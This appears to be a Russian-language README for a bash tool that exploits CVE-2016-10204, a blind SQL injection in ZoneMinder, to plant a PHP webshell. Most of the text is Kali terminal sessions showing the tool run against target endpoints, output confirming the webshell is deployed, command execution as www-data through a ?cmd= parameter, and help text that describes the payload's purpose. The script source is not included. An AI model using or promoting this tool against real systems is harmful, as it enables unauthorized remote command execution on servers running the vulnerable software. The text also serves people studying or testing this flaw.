
Bash-скрипт, демонстрирующий ручную эксплуатацию CVE-2016-10204 против целевой конечной точки, приводящую к загрузке php-веб-шелла.
Bash-скрипт, демонстрирующий ручную эксплуатацию CVE-2016-10204 на целевой конечной точке, приводящую к загрузке php-веб-шелла.
В настоящее время переменная webshell настроена для полезной нагрузки MySQL. Её можно заменить на любую другую необходимую базу данных.
Дополнительную информацию об этой CVE можно найти в следующих источниках:
Этот скрипт работает следующим образом:
Использование:
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/chmod +x CVE-2016-10204_Webshell.sh
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh testme http://127.0.0.1/zm/index.php
Общее использование:
/bin/bash CVE-2016-10204_Webshell.sh <суффикс_URL_веб-шелла> <http://целевая_конечная_точка/zm/index.php>
Справка:
Пример:
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Репозиторий автора: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
[*]================================[*]
[*]Целевой хост: 192.168.177.52:3305 [*]
[*]Целевая конечная точка: http://192.168.177.52:3305/zm/index.php [*]
[*]================================[*]
[*]================================[*]
[*]Попытка развёртывания веб-шелла. [*]
[*]================================[*]
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or
Warning: consider "--output <FILE>" to save to a file.
Exit Code for Timeout: 23
[*]================================[*]
[*]Развёртывание веб-шелла выполнено успешно. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Выполнение доступно через параметр ?cmd= [*]
[*]================================[*]
Повторный запуск на уже эксплуатированной цели:
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Репозиторий автора: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
[*]================================[*]
[*]Целевой хост: 192.168.177.52:3305 [*]
[*]Целевая конечная точка: http://192.168.177.52:3305/zm/index.php [*]
[*]================================[*]
[*]================================[*]
[*]Веб-шелл уже развёрнут. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Выполнение доступно через параметр ?cmd= [*]
[*]================================[*]
Встроенная справка:
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh -h
[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Репозиторий автора: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
CVE-2016-10204_Webshell
Bash-скрипт, демонстрирующий ручную эксплуатацию CVE-2016-10204 на целевой конечной точке,
приводящую к загрузке php-веб-шелла.
Дополнительная информация:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1
Использование:
/bin/bash CVE-2016-10204_Webshell.sh <суффикс_URL_веб-шелла> <http://цель/zm/index.php>
Пример:
/bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
Примечания:
- Проверяет, существует ли уже веб-шелл, перед попыткой эксплуатации.
- Формирует вредоносную полезную нагрузку SQLi для записи PHP-веб-шелла в /var/www/html.
- Подтверждает развёртывание, выполняя 'id' через параметр ?cmd=.
- Пожалуйста, используйте ответственно только на устройствах, на которые у вас есть разрешение. Это предназначено только для образовательных целей.